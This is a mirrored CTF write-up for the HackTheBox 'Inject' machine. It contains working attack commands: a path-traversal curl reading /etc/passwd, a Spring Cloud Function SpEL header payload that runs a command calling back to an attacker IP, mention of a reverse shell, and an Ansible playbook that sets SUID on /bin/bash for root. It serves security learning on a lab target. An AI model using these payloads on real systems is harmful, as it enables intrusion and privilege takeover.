Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackTheBox/Inject.md
ARZ 211b374d71
Create Inject.md
2023-07-10 22:13:11 +03:00

4.1 KiB
Raw Blame History

HackTheBox - Inject

NMAP

Nmap scan report for 10.10.11.204
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scanning the machine, we have two ports out which port 8080 is interesting to us as there's a web server running

PORT 8080

There's an option for login and signup but login doesn't take you anywhere so visting signup page

There is however an option to upload files on the home page

On trying to upload file normal txt file, it only shows that image file can be uploaded

Foothold

I got exahausted for trying to upload php files but it didn't work and it was a huge rabbit hole for me but if we notice how it's fetching the uploaded files

It's using a GET parameter for fetching the files, trying for LFI, it didn't showed any results on the browser but if we send a request from curl it will show that it's indeed vulnerable

curl 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd'

We can also see what files are there in the web root's directory by just traversing upto that path

curl 'http://10.10.11.204:8080/show_image?img=../../../'

We can read pom.xml file which tells about the infromation of the project

Here we can find Spring Framework cloud version 3.2.2 being used, on searching for vulnerabilities, spring cloud function is vulnerable to remote code execution by spring.cloud.function.routing-expression paramter and SpEL (Spring Expression Language) to execute system commands on the machine

curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl 10.10.14.21")' --data-raw 'data'

To get a reverse shell, we can add our payload in a shell script, upload it and execute it on the server

Stabilizing the shell with python

Privilege Escalation (Phil)

We can escalate to phil user by getting his password from .m2 directory in settings.xml file

Checking in what groups this user is in

With find we can look for files or folders on which this group has access

Running pspy we can run see ansible-playbook being ran as root user and executing the yaml file

Privilege Escalation (root)

We can escalate our privileges to root by shell paramter in our ansible yaml file to execute commands as root user /opt/automation/tasks

echo '[{hosts: localhost, tasks: [shell: 'chmod +s /bin/bash' ]}]' > playbook_2.yml

With chmod +s /bin/bash we can make bash a SUID meaning it will be executed as root on running it with -p

References